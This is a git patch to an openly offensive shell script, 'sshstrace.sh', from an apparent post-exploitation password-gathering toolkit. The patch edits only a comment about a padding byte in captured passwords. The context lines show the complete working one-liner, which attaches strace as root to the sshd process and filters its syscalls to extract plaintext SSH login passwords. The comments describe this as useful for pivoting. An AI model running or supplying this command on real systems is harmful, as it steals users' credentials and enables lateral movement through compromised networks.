From 2148ab4df6639b826e1e22e7e1109571e94010a1 Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 18:04:15 -0700
Subject: [PATCH] Update sshstrace.sh

---
 Get-Passwords/sshstrace.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index 2e18fde..8ea88af 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -2,7 +2,7 @@
 #
 # In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
 # Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
-# I've noticed some passwords seem to have an 'r' inserted before them. No idea why...
+# If the password is longer than 8 characters and odd-length, some padding byte appears to be inserted at the front
 #
 
 strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'